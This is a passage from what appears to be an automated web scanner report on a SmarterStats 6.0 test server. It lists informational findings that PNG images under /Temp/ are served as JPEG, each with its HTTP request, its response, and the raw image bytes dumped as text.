..c_o.VbO`.z.....O^H..;lR+5U...w....c..O..&.....H`.Z..b.-.t.....{...M.w..o.;l...Mj...Y.......{.}..6........J...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}s.a.6.lR+5U......}..c.. .I.....9....6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`...?.....JM..hy...?.....l..+.}C.l...Mj...Y.......{.}..6....^..[.A`.Z..b.-.t.....{...M.....>.^.l...Vj..E.;]......'@`..]...sX.6.lR+5U......}..c.. .I....u9.E..6...*f..N..>...    ..${[`[...l...Vj..E.;]......'@`..].........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`..?.`.6.lR+5U......}..c.. .I....59.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I......_). .I..T1..w....c..O..&.....H`.Z..b.-.t.....{..$..EZ.gi6[.......X.O.......W...h..v.[..}.-.\.....{.....*.-..?..2.g...l..^..wJ.;r{.Y...?..-. ..h....E.;.......'0.....................W...m...t.4.....G.}..c...z`+.j.e.O+.l..-./V;q.n......T..M.<...%..&..h.\....k....oz.....z...r..wg..E8..K.Z`;...v.^..9.....Eh.q..].q.....?.......v-...sJ/.~E.k...-..x.k`......u.....oN..b`.!..~.......?F...G_.v....r=...3......H.}..c...``;_to..~k.._.nv.Ny..c..
l_.{..h..v.[..}.-.\.....{..........8....<..X...
..N.c.. .I........m...Vj..E.;]......'@`..].....|.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]..K..[.A`.Z..b.-.t.....{...M.w../...S.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..;l...Mj...Y.......{.}..6....^.;.H...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}q.a.6.lR+5U......}..c.. .I....E....m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w../.a-. .I..T1..w....c..O..&....+~...m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w....a-. .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w.....s). .I..T1..w....c..O..&........m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&.....<.l.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I....Y..l.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I.......l.6.lR+5U......}..c.. .I...v.l.F....o........b.-.......{...m%p....l....E.. .u..o`K.} E.%D.._.E...m....P.wL..9....'......E:_G....S...
l.....h.w`{.+S
6.l.=...y.....h..............]..U....j:.[..{..w..R..7.=......cO....e).8v.....>!.8v.....L......G....c.^........../S.:.]{......v......g_..+../.l..o;..
l..w......]..R.qJ`{...N.F    ...JX{.....r]}.J`..._.n..:.U..._}.r.k;.U......p.\W.....y.#.F..c_%..m.o.F..>_%...W.    7.u..E`.......,.pv}<.......g`@.....=@...7...O>9h>$.m8..$:..7|0..f.\.^:..r.|0.O&.....(O>....=......<-f.....g.9..(.F..a.k..}..p5..gy...?Ul..cO`[    ....p....@....@........q...... ...... .........@....8,@`.;.@....@..........!.... ....6z.....a..|=.s_..........|s.f~...Z..r....2.._c
..a..?.|y..~l.........6V.r.j........o.R}R
..V.90.....k.~..%..._...UH^.O#..._.b....N`.>....v.......|.@y.$...'.o...?....p..........4..].........Z    m]`S>..v.w.....7.......r j.
\=a..y.}........r..Yv.xIt.v..,..?..K..t.?...FlCN%
.m.......n@...(.a{.........(;n.......oN.4...r.."...T....}.?.a.2.{.t...w~.g......    ..._.d.._.....D    l.u.g.Z..6.h....un.U.....Z..:v.*......|..z%...a.6#\.].e..zk......ki......o.......;....-......k{..X=.y.@....@..J..[%.e. .... ..X.....9... .... P)@`.......@.....K..6.4.A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0....[.i."_......IEND.B`.

10.18. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.19. http://vulnerable.smarterstats.6.0.host:9999/Temp/47b58eea1f494809bf127e28495c2dd7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/47b58eea1f494809bf127e28495c2dd7.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/47b58eea1f494809bf127e28495c2dd7.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:34 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEAA8BB00"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.20. http://vulnerable.smarterstats.6.0.host:9999/Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
